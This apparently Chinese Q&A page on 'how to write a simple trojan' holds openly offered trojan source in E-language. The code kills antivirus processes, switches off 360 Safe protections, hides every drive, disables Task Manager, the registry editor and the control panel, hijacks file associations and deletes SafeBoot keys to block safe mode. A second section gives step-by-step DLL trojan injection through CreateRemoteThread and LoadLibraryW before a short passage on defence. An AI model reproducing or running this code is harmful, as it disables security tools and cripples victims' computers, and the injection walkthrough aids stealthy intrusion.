简单木马程序代码怎么写_简单木马程序代码

hacker|
124

易语言编程编写木马代码程序的含义

运行 (“taskkill /f /im kavsvc.exe”, 假, 1)

运行 (“taskkill /f /im KVXP.kxp”, 假, 1)

运行 (“taskkill /f /im Rav.exe”, 假, 1)

运行 (“taskkill /f /im Ravmon.exe”, 假, 1)

运行 (“taskkill /f /im Mcshield.exe”, 假, 1)

运行 (“taskkill /f /im VsTskMgr.exe”, 假, 1)

写注册项 (4, “SOFTWARE\360Safe\safemon\ExecAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\MonAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\SiteAccess”, 0)

写注册项 (4, “SOFTWARE\360Safe\safemon\UDiskAccess”, 0)

运行 (“taskkill /f /im 360tray.exe”, 假, 1) ' 结束360进程

' 修改关联

写注册项 (1, “.txt\”, “jpegfile”)

写注册项 (1, “.inf\”, “jpegfile”)写注册项 (4, “SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue”, 0) ' 隐藏文件和文件夹

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, 0) ' 禁用任务管理器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoControlPanel”, 1) ' 禁用控制面板

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\System\Disableregistrytools”, 1) ' 禁用注册表

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun”, 1) ' 隐藏开始中的运行 禁止WIN2000/XP通过任务管理器创建新任务写注册项 (3, “SoftWare \Microsoft \Windows \CurrentVersion \Policies\WinOldApp\Disabled”, 1)

' 隐藏“MS-DOS方式”下的磁盘驱动器。不管是在“我的电脑”里,或“MS-DOS”方式下都看不见了

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives”, 4294967295) ' 隐藏所有驱动器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewOnDrive”, 4294967295) ' 禁止所有驱动器

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions”, 1) ' 隐藏文件夹选项

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop”, 1) ' 将桌面对象隐藏

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, 1) ' 隐藏开始中的关机

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind”, 1) ' 隐藏开始中的搜索

' 写注册项 (3, “Software\Policies\Microsoft\Windows\System\DisableCMD”, 1)'1 禁用CMD和.BAT文件 2 禁CMD不禁.BAT 0启用两项

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage”, 1) ' 隐藏主页选项组

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu”, 1) ' 隐藏IE文件菜单

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFavorites”, 1) ' 隐藏收藏夹菜单

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoPrinting”, 1) ' 禁用IE打印功能

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions”, 1) ' 隐藏Internet选项

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource”, 1) ' 禁止IE查看源文件

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Interner Settings\Zones\3\1803”, 3) ' 禁用IE下载功能

写注册项 (3, “Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu”, 1) ' 禁止右键关联菜单

写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRealMode”, 1) ' 禁止“重新启动计算机切换到MS-DOS方式”写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 禁止显示“注销”写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRecentDocsMenu”, 1) ' 禁止文档菜单写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff”, 1) ' 去掉“开始”选单中的“登录”项写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu”, 1) ' 禁止使用鼠标右键写注册项 (3, “Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders”, 1) ' 禁止修改控制面版

.版本 2' 无法进入安全模式

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Base\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\File system\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Filter\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\”)

删除注册项 (4, “SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay”)

销毁 ()

木马源代码

愿我的答案 能够解决您的烦忧

如果自己不会免杀千万不要自己去制作木马病毒,如果不会免杀什么的中毒的肯定会是你自己

1,所以说如果自己制作出来了,发现电脑出问题,要重启按F8进入联网安全模式按我说的来操作。

2,下载腾讯电脑管家“8.4”最新版,对电脑首先进行一个体检,打开所有防火墙避免系统其余文件被感染。

3,打开杀毒页面开始查杀,切记要打开小红伞引擎。

4,如果普通查杀不能解决问题,您可以打开腾讯电脑管家---工具箱---顽固木马专杀- 进行深度

扫描。

5,查杀处理完所有病毒后,立刻重启电脑,再进行一次安全体检,清除多余系统缓存文件,避免二次感染。

如果您对我的答案不满意,可以继续追问或者提出宝贵意见,谢谢

dll文件的作用和dll木马的原理及使用

DLL木马的实现原理是编程者在DLL中包含木马程序代码,随后在目标主机中选择特定目标进程,以某种方式强行指定该进程调用包含木马程序的DLL,最终达到侵袭目标系统的目的。

正是DLL程序自身的特点决定了以这种形式加载木马不仅可行,而且具有良好的隐藏性:

(1)DLL程序被映射到宿主进程的地址空间中,它能够共享宿主进程的资源,并根据宿主进程在目标主机的级别非法访问相应的系统资源;

(2)DLL程序没有独立的进程地址空间,从而可以避免在目标主机中留下"蛛丝马迹",达到隐蔽自身的目的。

DLL木马实现了"真隐藏",我们在任务管理器中看不到木马"进程",它完全溶进了系统的内核。与"真隐藏"对应的是"假隐藏","假隐藏"木马把自己注册成为一个服务。虽然在任务管理器中也看不到这个进程,但是"假隐藏"木马本质上还具备独立的进程空间。"假隐藏"只适用于Windows9x的系统,对于基于WINNT的操作系统,通过服务管理器,我们可以发现系统中注册过的服务。

DLL木马注入其它进程的方法为远程线程插入。

远程线程插入技术指的是通过在另一个进程中创建远程线程的方法进入那个进程的内存地址空间。将木马程序以DLL的形式实现后,需要使用插入到目标进程中的远程线程将该木马DLL插入到目标进程的地址空间,即利用该线程通过调用Windows API LoadLibrary函数来加载木马DLL,从而实现木马对系统的侵害。

DLL木马注入程序

这里涉及到一个非常重要的Windows API――CreateRemoteThread。与之相比,我们所习惯使用的CreateThread API函数只能在进程自身内部产生一个新的线程,而且被创建的新线程与主线程共享地址空间和其他资源。而CreateRemoteThread则不同,它可以在另外的进程中产生线程!CreateRemoteThread有如下特点:

(1)CreateRemoteThread较CreateThread多一个参数hProcess,该参数用于指定要创建线程的远程进程,其函数原型为:

HANDLE CreateRemoteThread(

 HANDLE hProcess, //远程进程句柄

 LPSECURITY_ATTRIBUTES lpThreadAttributes,

 SIZE_T dwStackSize,

 LPTHREAD_START_ROUTINE lpStartAddress,

 LPVOID lpParameter,

 DWORD dwCreationFlags,

 LPDWORD lpThreadId

);

(2)线程函数的代码不能位于我们用来注入DLL木马的进程所在的地址空间中。也就是说,我们不能想当然地自己写一个函数,并把这个函数作为远程线程的入口函数;

(3)不能把本进程的指针作为CreateRemoteThread的参数,因为本进程的内存空间与远程进程的不一样。

(4)利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间,并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

(5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,这个函数将作为随后将启动的远程线程的入口函数;

(6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的入口函数地址,将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL;

(7)清理现场。

DLL木马的防治

从DLL木马的原理和一个简单的DLL木马程序中我们学到了DLL木马的工作方式,这可以帮助我们更好地理解DLL木马病毒的防治手段。

一般的木马被植入后要打开一网络端口与攻击程序通信,所以防火墙是抵御木马攻击的最好方法。防火墙可以进行数据包过滤检查,我们可以让防火墙对通讯端口进行限制,只允许系统接受几个特定端口的数据请求。这样,即使木马植入成功,攻击者也无法进入到受侵系统,防火墙把攻击者和木马分隔开来了。

对于DLL木马,一种简单的观察方法也许可以帮助用户发现之。我们查看运行进程所依赖的DLL,如果其中有一些莫名其妙的DLL,则可以断言这个进程是宿主进程,系统被植入了DLL木马。"道高一尺,魔高一丈",现如今,DLL木马也发展到了更高的境界,它们看起来也不再"莫名其妙"。在最新的一些木马里面,开始采用了先进的DLL陷阱技术,编程者用特洛伊DLL替换已知的系统DLL。特洛伊DLL对所有的函数调用进行过滤,对于正常的调用,使用函数转发器直接转发给被替换的系统DLL;对于一些事先约定好的特殊情况,DLL会执行一些相应的操作。

0条大神的评论

发表评论